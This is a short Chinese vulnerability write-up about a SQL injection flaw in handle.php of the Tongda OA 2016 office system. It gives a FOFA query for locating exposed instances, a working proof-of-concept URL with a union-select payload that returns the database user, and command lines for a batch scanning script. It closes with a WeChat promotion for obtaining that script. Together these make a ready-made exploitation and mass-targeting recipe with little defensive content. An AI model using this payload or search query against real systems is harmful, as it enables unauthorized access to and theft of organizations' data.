通达OA 2016网络智能办公系统 handle.php SQL注入漏洞

一、漏洞描述

北京通达信科科技有限公司通达OA2016网络智能办公系统 handle.php 存在sql注入漏洞,攻击者可利用此漏洞获取数据库管理员权限,查询数据、获取系统信息,威胁企业单位数据安全。

通达OA 2016网络智能办公系统 handle.php SQL注入漏洞_第1张图片

二、网络空间搜索引擎查询

fofa查询

app="TDXK-通达OA" && body="2016"

通达OA 2016网络智能办公系统 handle.php SQL注入漏洞_第2张图片

三、漏洞复现

poc

/share/handle.php?_GET[module]=1%27+and+1={`=%27`+1}+and+1=0+union+select+(select/**/user())--+%27

通达OA 2016网络智能办公系统 handle.php SQL注入漏洞_第3张图片

浏览器直接访问

通达OA 2016网络智能办公系统 handle.php SQL注入漏洞_第4张图片

四、批量检测

单个检测

 python .\TdOA2016.py -u  http://ip:port

通达OA 2016网络智能办公系统 handle.php SQL注入漏洞_第5张图片

批量检测

 python .\TdOA2016.py -u filename

通达OA 2016网络智能办公系统 handle.php SQL注入漏洞_第6张图片

微信公众号关注 网络安全透视镜 回复 20231016 获取批量检测脚本

你可能感兴趣的:(web安全,网络安全,系统安全,SQL注入)